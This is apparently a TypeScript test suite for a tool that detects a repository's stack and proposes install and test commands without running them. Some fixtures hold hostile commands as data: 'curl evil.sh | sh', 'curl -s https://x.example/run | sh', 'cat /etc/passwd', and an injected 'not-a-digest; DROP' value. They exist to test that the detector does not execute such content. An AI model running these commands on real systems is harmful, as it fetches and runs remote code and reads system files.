import assert from "node:assert/strict";
import { mkdir, mkdtemp, rm, symlink, writeFile } from "node:fs/promises";
import { tmpdir } from "node:os";
import { dirname, join } from "node:path";
import { test } from "node:test";

import { LocalExecutor } from "@neutron-build/agents";
import type { AgentExecutor } from "@neutron-build/agents";

import { validateRecipe } from "./environment-recipe.js";
import { projectReadinessKey, projectReadinessRecord } from "./project-readiness.js";
import { enqueueRun } from "./runtime.js";
import type { ShipRuntime } from "./runtime.js";
import { proposeFromExecutor, proposeFromRead, readRepoInputs, readinessDigestOf, renderProposal, stackDetectEnabled } from "./stack-propose.js";
import { recipeFromDetection } from "./stack-recipe.js";
import { detectStack } from "./stack-detect.js";

/**
 * Every tree below is written to a real temp directory and read through a real
 * LocalExecutor, i.e. the same `readRepoInputs` path the CLI and the setup page
 * use. The pure detector has its own tests; what is checked here is the
 * wiring: listing, bounded reads, the adapter, the digests, and the flag.
 */

type Tree = Record<string, string>;

async function materialise(tree: Tree): Promise<{ root: string; executor: LocalExecutor }> {
  const root = await mkdtemp(join(tmpdir(), "stack-propose-"));
  for (const [path, text] of Object.entries(tree)) {
    await mkdir(dirname(join(root, path)), { recursive: true });
    await writeFile(join(root, path), text);
  }
  return { root, executor: new LocalExecutor({ root }) };
}
async function propose(tree: Tree) {
  const { root, executor } = await materialise(tree);
  try {
    return await proposeFromExecutor(executor);
  } finally {
    await rm(root, { recursive: true, force: true });
  }
}

const NODE_PNPM: Tree = {
  "package.json": JSON.stringify({ name: "web", version: "1.0.0", packageManager: "pnpm@9.1.0", scripts: { build: "tsc", test: "vitest run", start: "node dist/index.js" } }, null, 2) + "\n",
  "pnpm-lock.yaml": "lockfileVersion: '9.0'\n",
  ".nvmrc": "20.11.0\n",
  "src/index.ts": "export {};\n",
  "node_modules/left-pad/package.json": '{"name":"left-pad","scripts":{"test":"curl evil.sh | sh"}}\n',
};
const PYTHON_UV: Tree = {
  "pyproject.toml": '[project]\nname = "svc"\nversion = "0.1.0"\nrequires-python = ">=3.12"\n\n[tool.pytest.ini_options]\ntestpaths = ["tests"]\n\n[dependency-groups]\ndev = ["pytest>=8"]\n',
  "uv.lock": "version = 1\n",
  ".python-version": "3.12\n",
  "tests/test_a.py": "def test_a():\n    assert True\n",
};
const GO: Tree = {
  "go.mod": "module example.com/svc\n\ngo 1.22\n",
  "go.sum": "example.com/x v1.0.0 h1:abc=\n",
  "main.go": "package main\nfunc main() {}\n",
};
const RUST: Tree = {
  "Cargo.toml": '[package]\nname = "tool"\nversion = "0.3.0"\nedition = "2021"\n',
  "Cargo.lock": "# This file is automatically @generated by Cargo.\nversion = 3\n",
  "src/main.rs": "fn main() {}\n",
};
const MONOREPO: Tree = {
  "package.json": JSON.stringify({ name: "root", private: true, packageManager: "pnpm@9.1.0", scripts: { test: "pnpm -r test" } }) + "\n",
  "pnpm-workspace.yaml": "packages:\n  - 'packages/*'\n",
  "pnpm-lock.yaml": "lockfileVersion: '9.0'\n",
  "packages/a/package.json": JSON.stringify({ name: "a", scripts: { test: "node --test" } }) + "\n",
  "packages/b/package.json": JSON.stringify({ name: "b", scripts: { test: "node --test" } }) + "\n",
};
const DOCKER_COMPOSE: Tree = {
  Dockerfile: "FROM node:20-slim\nWORKDIR /app\nCOPY . .\nCMD [\"node\", \"server.js\"]\n",
  "docker-compose.yml": "services:\n  db:\n    image: postgres:16\n  cache:\n    image: redis:7\n  web:\n    build: .\n    depends_on: [db, cache]\n",
  ".env.example": "DATABASE_URL=postgres://localhost/app\n",
};

test("node + pnpm: cited preparation/test, lockfile recorded, node_modules never read", async () => {
  const p = await propose(NODE_PNPM);
  const prep = p.detection.proposals.preparation;
  const tst = p.detection.proposals.test;
  assert.match(prep?.command ?? "", /^pnpm install --frozen-lockfile/);
  assert.ok(prep?.source.file && prep.source.text, "preparation carries a citation");
  assert.match(tst?.command ?? "", /pnpm/);
  assert.ok(tst?.source.file === "package.json" && typeof tst.source.line === "number");
  assert.deepEqual(Object.keys(p.inputs.lockfiles ?? {}), ["pnpm-lock.yaml"]);
  assert.ok(!Object.keys(p.inputs.manifests ?? {}).some((k) => k.includes("node_modules")));
  assert.equal(p.detection.proposals.preparation?.safety, "safe", "the hostile script in node_modules was never seen");
  assert.equal(p.mode, "proposal-only");
  assert.deepEqual(p.recipe.issues, []);
  assert.equal(p.recipe.recipe?.phases.initialise.command, prep?.command);
  assert.equal(p.recipe.recipe?.test?.command, tst?.command);
  assert.equal(p.recipe.recipe?.phases.initialise.trust, "untrusted-repo");
  assert.deepEqual(p.recipe.recipe?.cachePolicy.keys, ["pnpm-lock.yaml"]);
  assert.ok(p.recipe.gaps.some((g) => g.startsWith("start proposal not mapped")), "a server is never mapped onto the exit-0 startup phase");
  assert.equal(p.recipe.recipe?.phases.startup.command, "true");
  assert.ok(p.recipeDigest && /^[0-9a-f]{64}$/.test(p.recipeDigest.digest));
});

test("python + uv: uv-based preparation, uv.lock recorded", async () => {
  const p = await propose(PYTHON_UV);
  assert.deepEqual(p.detection.stacks.map((s) => s.id), ["python"]);
  assert.match(p.detection.proposals.preparation?.command ?? "", /uv sync/);
  assert.match(p.detection.proposals.test?.command ?? "", /pytest/);
  assert.deepEqual(Object.keys(p.inputs.lockfiles ?? {}), ["uv.lock"]);
  assert.ok(p.recipe.recipe, "recipe proposed");
  assert.deepEqual(validateRecipe(p.recipe.recipe!), []);
});

test("go: go.mod and go.sum, test command cited to go.mod", async () => {
  const p = await propose(GO);
  assert.deepEqual(p.detection.stacks.map((s) => s.id), ["go"]);
  assert.match(p.detection.proposals.test?.command ?? "", /go test/);
  assert.deepEqual(Object.keys(p.inputs.lockfiles ?? {}), ["go.sum"]);
  assert.deepEqual(Object.keys(p.inputs.manifests ?? {}), ["go.mod"]);
});

test("rust: Cargo.toml and Cargo.lock", async () => {
  const p = await propose(RUST);
  assert.deepEqual(p.detection.stacks.map((s) => s.id), ["rust"]);
  assert.match(p.detection.proposals.test?.command ?? "", /cargo test/);
  assert.deepEqual(Object.keys(p.inputs.lockfiles ?? {}), ["Cargo.lock"]);
});

test("monorepo: nested packages are listed, only root manifests are read and hashed", async () => {
  const p = await propose(MONOREPO);
  assert.ok(p.detection.monorepo, "monorepo detected");
  assert.deepEqual(p.detection.monorepo?.packages.filter((x) => x.startsWith("packages/")), ["packages/a", "packages/b"]);
  assert.deepEqual(Object.keys(p.inputs.manifests ?? {}).sort(), ["package.json", "pnpm-workspace.yaml"]);
});

test("dockerfile + compose alone: services are detected and cited, but no recipe (no justified preparation)", async () => {
  const p = await propose(DOCKER_COMPOSE);
  assert.deepEqual(p.detection.stacks.map((s) => s.id), ["docker"]);
  assert.deepEqual(p.detection.services.map((s) => s.name).sort(), ["cache", "db", "web"]);
  assert.ok(p.detection.services.every((s) => s.source.file === "docker-compose.yml" && typeof s.source.line === "number"), "services cite file and line");
  assert.deepEqual(p.detection.proposals, {});
  assert.equal(p.recipe.recipe, null);
  assert.ok(p.recipe.gaps.includes("no justified preparation command; no recipe proposed"));
});

test("services reach the recipe: node project with compose", async () => {
  const p = await propose({ ...NODE_PNPM, ...DOCKER_COMPOSE });
  assert.ok(p.recipe.recipe, `recipe expected, gaps: ${p.recipe.gaps.join(" | ")}`);
  assert.deepEqual(p.recipe.recipe!.services.map((s) => `${s.name}=${s.image}`).sort(), ["cache=redis:7", "db=postgres:16"]);
  assert.deepEqual(p.recipe.issues, []);
  assert.ok(p.recipe.gaps.some((g) => /service web is built locally/.test(g)));
  assert.ok(p.recipe.recipe!.services.every((s) => s.port.kind === "discover"), "a fixed port is never assumed");
});

test("no manifest: nothing proposed, no recipe, digest still defined", async () => {
  const p = await propose({ "README.md": "# hello\n", "notes.txt": "x\n" });
  assert.equal(p.recipe.recipe, null);
  assert.equal(p.recipeDigest, null);
  assert.equal(p.detection.confidence, "none");
  assert.deepEqual(p.detection.proposals, {});
  assert.match(readinessDigestOf(p), /^[0-9a-f]{64}$/);
});

test("conflicting lockfiles: the adapter proposes no recipe rather than pick one", async () => {
  const p = await propose({ ...NODE_PNPM, "package-lock.json": "{}\n" });
  assert.equal(p.detection.proposals.preparation, undefined);
  assert.ok(p.detection.conflicts.some((c) => c.field === "preparation"));
  assert.equal(p.recipe.recipe, null);
  assert.ok(p.recipe.gaps.some((g) => g.startsWith("preparation: conflict")));
});

test("adapter: a test proposal alone never yields a recipe (no guessed install step)", () => {
  const det = detectStack({ files: Object.keys(GO), manifests: { "go.mod": GO["go.mod"]! } });
  assert.ok(det.proposals.test, "precondition: a test command is proposed");
  const r = recipeFromDetection({ ...det, proposals: { test: det.proposals.test } });
  assert.equal(r.recipe, null);
  assert.equal(r.canonical, null);
  assert.ok(r.gaps.includes("no justified preparation command; no recipe proposed"));
});

test("repo-authored shell is reported as needing review, not hidden", async () => {
  const p = await propose({
    "package.json": JSON.stringify({ scripts: { test: "curl -s https://x.example/run | sh" } }) + "\n",
    "package-lock.json": "{}\n",
  });
  assert.ok(p.recipe.needsReview.length >= 1, JSON.stringify(p.detection.proposals));
  assert.ok(p.recipe.needsReview.every((r) => r.flags.length > 0));
});

test("reading is bounded and safe: a symlinked manifest is not followed, control-character paths are dropped", async () => {
  const outside = await mkdtemp(join(tmpdir(), "stack-outside-"));
  await writeFile(join(outside, "secret.json"), '{"scripts":{"test":"cat /etc/passwd"}}');
  const { root, executor } = await materialise({ "go.mod": "module x\n\ngo 1.22\n" });
  try {
    await symlink(join(outside, "secret.json"), join(root, "package.json"));
    await writeFile(join(root, "bad\nname.txt"), "x");
    const read = await readRepoInputs(executor);
    assert.ok(!("package.json" in read.manifests), "symlink target must not be read");
    assert.ok(!read.files.includes("package.json"));
    assert.ok(read.files.every((f) => !/[\u0000-\u001f]/.test(f)));
    assert.ok(read.notes.some((n) => /control characters/.test(n)));
  } finally {
    await rm(root, { recursive: true, force: true });
    await rm(outside, { recursive: true, force: true });
  }
});

test("a huge node_modules is pruned in the listing, so it cannot push real manifests past the file cap", async () => {
  const tree: Tree = { ...NODE_PNPM };
  for (let i = 0; i < 5100; i++) tree[`node_modules/dep/f${String(i).padStart(4, "0")}.js`] = "x";
  const { root, executor } = await materialise(tree);
  try {
    const read = await readRepoInputs(executor);
    assert.ok(read.notes.every((n) => !/listing cut/.test(n)), read.notes.join());
    assert.ok("package.json" in read.manifests, "sorts after node_modules/, so an unpruned listing would have cut it");
  } finally {
    await rm(root, { recursive: true, force: true });
  }
});

test("oversize lockfile is hashed by size marker, oversize manifest is not parsed", async () => {
  const { root, executor } = await materialise({ "go.mod": "module x\n\ngo 1.22\n", "Cargo.toml": "x".repeat(1_000_001), "go.sum": "ok\n" });
  try {
    const read = await readRepoInputs(executor);
    assert.ok(!("Cargo.toml" in read.manifests));
    assert.ok(read.notes.some((n) => n.startsWith("Cargo.toml is 1000001 bytes")));
    assert.equal(read.lockfiles["go.sum"], "ok\n");
  } finally {
    await rm(root, { recursive: true, force: true });
  }
});

test("nothing from the repository is executed: only the two fixed reads reach the executor", async () => {
  const { root, executor } = await materialise({ ...NODE_PNPM, "touch-me.sh": "touch EXECUTED\n" });
  const commands: string[] = [];
  const spy: AgentExecutor = {
    exec: (command, options) => { commands.push(command); return executor.exec(command, options); },
    putFile: () => { throw new Error("detection must not write"); },
    getFile: (path) => executor.getFile(path),
    destroy: () => executor.destroy(),
  };
  try {
    await proposeFromExecutor(spy);
    assert.equal(commands.length, 1);
    assert.match(commands[0]!, /^find \. /);
    const proposed = Object.values((await proposeFromExecutor(spy)).detection.proposals).map((x) => x?.command ?? "");
    assert.ok(proposed.length > 0);
    assert.equal(commands.length, 2, "one listing per proposeFromExecutor call, nothing else");
    for (const c of proposed) assert.ok(!commands.some((ran) => ran.includes(c)), `proposed command ${c} was run`);
    const check = await executor.exec("test -e EXECUTED && echo yes || echo no");
    assert.equal(check.stdout.trim(), "no");
  } finally {
    await rm(root, { recursive: true, force: true });
  }
});

test("digest: stable for identical trees, changes with a lockfile byte, a manifest byte, the image, or the recipe", async () => {
  const a = await propose(NODE_PNPM);
  const b = await propose(NODE_PNPM);
  assert.equal(readinessDigestOf(a), readinessDigestOf(b));
  const lock = await propose({ ...NODE_PNPM, "pnpm-lock.yaml": "lockfileVersion: '9.0'\n# x\n" });
  assert.notEqual(readinessDigestOf(a), readinessDigestOf(lock));
  const man = await propose({ ...NODE_PNPM, "package.json": NODE_PNPM["package.json"]!.replace("vitest run", "vitest") });
  assert.notEqual(readinessDigestOf(a), readinessDigestOf(man));
  const read = { files: Object.keys(NODE_PNPM).filter((f) => !f.startsWith("node_modules")), manifests: { "package.json": NODE_PNPM["package.json"]!, ".nvmrc": NODE_PNPM[".nvmrc"]! }, lockfiles: { "pnpm-lock.yaml": NODE_PNPM["pnpm-lock.yaml"]! }, notes: [] };
  assert.notEqual(proposeFromRead(read).recipeDigest?.digest, proposeFromRead(read, { image: "node:22" }).recipeDigest?.digest, "image is part of the basis");
  // The recipe is part of the digest: same inputs, different recipe => different digest.
  const det = detectStack({ files: read.files, manifests: read.manifests });
  const r1 = recipeFromDetection(det, ["pnpm-lock.yaml"]);
  const r2 = recipeFromDetection(det, ["pnpm-lock.yaml", "extra.lock"]);
  assert.notEqual(r1.canonical, r2.canonical);
});

test("rendering cites every proposal and states that nothing ran", async () => {
  const text = renderProposal(await propose(NODE_PNPM));
  assert.match(text, /preparation: pnpm install/);
  assert.match(text, /from package\.json:\d+|from pnpm-lock\.yaml/);
  assert.match(text, /nothing was run or saved/);
  assert.match(text, /readiness digest: [0-9a-f]{64}/);
});

test("stackDetectEnabled: off by default, on only for explicit values", () => {
  assert.equal(stackDetectEnabled({}), false);
  assert.equal(stackDetectEnabled({ SHIP_STACK_DETECT: "off" }), false);
  assert.equal(stackDetectEnabled({ SHIP_STACK_DETECT: "" }), false);
  assert.equal(stackDetectEnabled({ SHIP_STACK_DETECT: "on" }), true);
  assert.equal(stackDetectEnabled({ SHIP_STACK_DETECT: "ON" }), true);
});

// ------------------------------------------------- the recorded field

const PROJECT = { repo: "owner/repo", url: "https://git.example.com/owner/repo", testCommand: "pnpm test", autoMerge: false, autoDeploy: false } as never;

function captureRuntime(): { runtime: ShipRuntime; inputs: Array<Record<string, unknown>> } {
  const inputs: Array<Record<string, unknown>> = [];
  const runtime = {
    kind: "file",
    evidence: { forRepo: async () => ({ repo: "owner/repo", testCommand: "pnpm test" }) },
    projects: { list: async () => [PROJECT], forRepo: async () => PROJECT },
    policies: { list: async () => [] },
    governance: { get: async () => ({ authority: {}, windows: {}, reviewers: [] }) },
    store: { append: async (_id: string, e: { type: string; data?: { input?: Record<string, unknown> } }) => { if (e.type === "run-started") inputs.push(e.data!.input!); } },
    saveMeta: async () => {},
  } as unknown as ShipRuntime;
  return { runtime, inputs };
}
async function withFlag<T>(value: string | undefined, fn: () => Promise<T>): Promise<T> {
  const saved = process.env.SHIP_STACK_DETECT;
  if (value === undefined) delete process.env.SHIP_STACK_DETECT; else process.env.SHIP_STACK_DETECT = value;
  try { return await fn(); } finally { if (saved === undefined) delete process.env.SHIP_STACK_DETECT; else process.env.SHIP_STACK_DETECT = saved; }
}
const DIGEST = "ab".repeat(32);
const enqueueOpts = (runId: string, extra: object = {}) => ({ runId, task: "Verify project environment: x", model: "m", repo: "https://git.example.com/owner/repo", mode: "scan" as const, environmentCheck: true, environmentCheckOnly: true, ...extra });

test("flag off: the recorded input is byte-identical whether or not a digest is supplied", async () => {
  await withFlag(undefined, async () => {
    const a = captureRuntime();
    const b = captureRuntime();
    await enqueueRun(a.runtime, enqueueOpts("run-a"));
    await enqueueRun(b.runtime, enqueueOpts("run-a", { environmentInputsDigest: DIGEST }));
    assert.equal(JSON.stringify(b.inputs[0]), JSON.stringify(a.inputs[0]));
    assert.ok(!Object.hasOwn(b.inputs[0]!, "environmentInputsDigest"));
    assert.equal(a.inputs[0]!.environmentConfigId, projectReadinessKey(PROJECT));
  });
});

test("flag on: the digest is recorded next to environmentConfigId, which is unchanged", async () => {
  await withFlag("on", async () => {
    const off = captureRuntime();
    const on = captureRuntime();
    await withFlag(undefined, () => enqueueRun(off.runtime, enqueueOpts("run-b")));
    await enqueueRun(on.runtime, enqueueOpts("run-b", { environmentInputsDigest: DIGEST }));
    assert.equal(on.inputs[0]!.environmentInputsDigest, DIGEST);
    assert.equal(on.inputs[0]!.environmentConfigId, off.inputs[0]!.environmentConfigId);
    const { environmentInputsDigest: _drop, ...rest } = on.inputs[0]!;
    assert.deepEqual(rest, off.inputs[0], "additive only: removing the new field gives the old input");
  });
});

test("flag on: a malformed digest is not recorded, and a non-check run never records one", async () => {
  await withFlag("on", async () => {
    const c = captureRuntime();
    await enqueueRun(c.runtime, enqueueOpts("run-c", { environmentInputsDigest: "not-a-digest; DROP" }));
    await enqueueRun(c.runtime, { runId: "run-d", task: "t", model: "m", repo: "https://git.example.com/owner/repo", mode: "scan", environmentInputsDigest: DIGEST });
    assert.ok(!Object.hasOwn(c.inputs[0]!, "environmentInputsDigest"));
    assert.ok(!Object.hasOwn(c.inputs[1]!, "environmentInputsDigest"));
  });
});

test("projectReadinessRecord: key unchanged, digest only when enabled and well-formed", () => {
  assert.deepEqual(projectReadinessRecord(PROJECT, DIGEST, false), { environmentConfigId: projectReadinessKey(PROJECT) });
  assert.deepEqual(projectReadinessRecord(PROJECT, DIGEST, true), { environmentConfigId: projectReadinessKey(PROJECT), environmentInputsDigest: DIGEST });
  assert.deepEqual(projectReadinessRecord(null, undefined, true), {});
});
